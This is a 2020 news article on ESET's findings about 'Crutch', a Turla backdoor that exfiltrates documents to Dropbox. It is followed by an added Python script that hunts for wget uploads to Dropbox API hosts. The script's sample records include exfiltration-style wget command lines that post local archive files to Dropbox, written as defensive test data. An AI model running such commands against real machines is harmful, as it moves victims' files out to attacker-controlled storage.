
Malware

Russia


The Russian Malware ‘Crutch’ Used in Attacks Against Military Organizations

Cybersecurity Firm Uncovers Crutch, Russian Malware Used in APT Attacks

04-Dec-2020

Codenamed "Crutch" by ESET researchers, the malware has been attributed to Turla (also known as Venomous Bear or Snake), a Russia-based advanced hacker group known for its severe attacks against governments, embassies and military groups through various watering hole and spear-phishing methods, from 2015 until early 2020.

In its analysis, the cybersecurity firm said the tools were designed to exfiltrate sensitive documents and other files to Dropbox accounts controlled by Turla operators.

The researchers identified strong links between a Crutch sample from 2016 and Gazer, another of Turla's second-stage backdoors, and the latest malware in the group's diverse toolset points to its continued focus on spying against high-profile targets.

Crutch is delivered through the Skipper suite, a first-stage implant previously attributed to Turla, with two different versions of the malware spotted before and after mid-2019.

The former included a backdoor that communicates with a hardcoded Dropbox account using the official HTTP API and was responsible for receiving commands and uploading the results. The newer variant ("Crutch v4") drops that setup in favor of a new feature that can automatically upload the files found on local and removable drives to Dropbox by using the Windows Wget utility.

ESET researcher Matthieu Faou stated that the sophistication of the attacks and the technical details of the discovery further strengthen the perception that the Turla group has sufficient resources to operate such a large and diverse arsenal.
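
As an added example (not from ESET's report or from this article), here is a hunt for the Crutch v4 behaviour described above: a Windows wget process sending a request body to a Dropbox API host. The `host|image|command line` record format, the function names and the sample command lines are constructed for illustration and are not Crutch's actual arguments.

```python
import ntpath
from urllib.parse import urlsplit

# Dropbox API hosts to watch; GNU Wget options that attach a request body.
DROPBOX_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com"}
UPLOAD_OPTS = ("--post-file", "--post-data", "--body-file", "--body-data")

def sends_body(tokens):
    """True if the wget arguments carry a request body or a POST/PUT method."""
    for i, tok in enumerate(tokens):
        name, _, value = tok.partition("=")
        if name in UPLOAD_OPTS:
            return True
        if name == "--method":
            # Accept both "--method=PUT" and "--method PUT".
            method = value or (tokens[i + 1] if i + 1 < len(tokens) else "")
            if method.upper() in ("POST", "PUT"):
                return True
    return False

def dropbox_targets(tokens):
    """Return the Dropbox API hostnames that appear as URL arguments."""
    urls = (t.strip("\"'") for t in tokens if "://" in t)
    hosts = {(urlsplit(u).hostname or "").lower() for u in urls}
    return hosts & DROPBOX_HOSTS

def hunt(records):
    """Flag process-creation records where wget uploads to the Dropbox API."""
    hits = []
    for rec in records:
        host, image, cmdline = rec.split("|", 2)
        if ntpath.basename(image).lower() != "wget.exe":
            continue
        tokens = cmdline.split()
        targets = dropbox_targets(tokens)
        if targets and sends_body(tokens):
            hits.append((host, image, sorted(targets)))
    return hits

# Constructed sample records (assumed format): host|image|command line
SAMPLE = [
    r"WS-014|C:\Users\Public\wget.exe|wget.exe --header=Authorization:<token> --post-file=C:\Temp\a.rar https://content.dropboxapi.com/<path>",
    r"WS-020|C:\Tools\wget.exe|wget.exe https://www.dropbox.com/s/example/setup.zip",
    r"WS-031|C:\Tools\wget.exe|wget.exe --method=PUT --body-file=report.csv https://intranet.example/upload",
    r"WS-044|C:\ProgramData\wget.exe|wget.exe --method POST --body-file=C:\Temp\b.rar https://content.dropboxapi.com/<path>",
]

if __name__ == "__main__":
    print(hunt(SAMPLE))
```

Matching on the file name alone misses a renamed wget binary, so pair this with proxy or DNS logs for the same hosts.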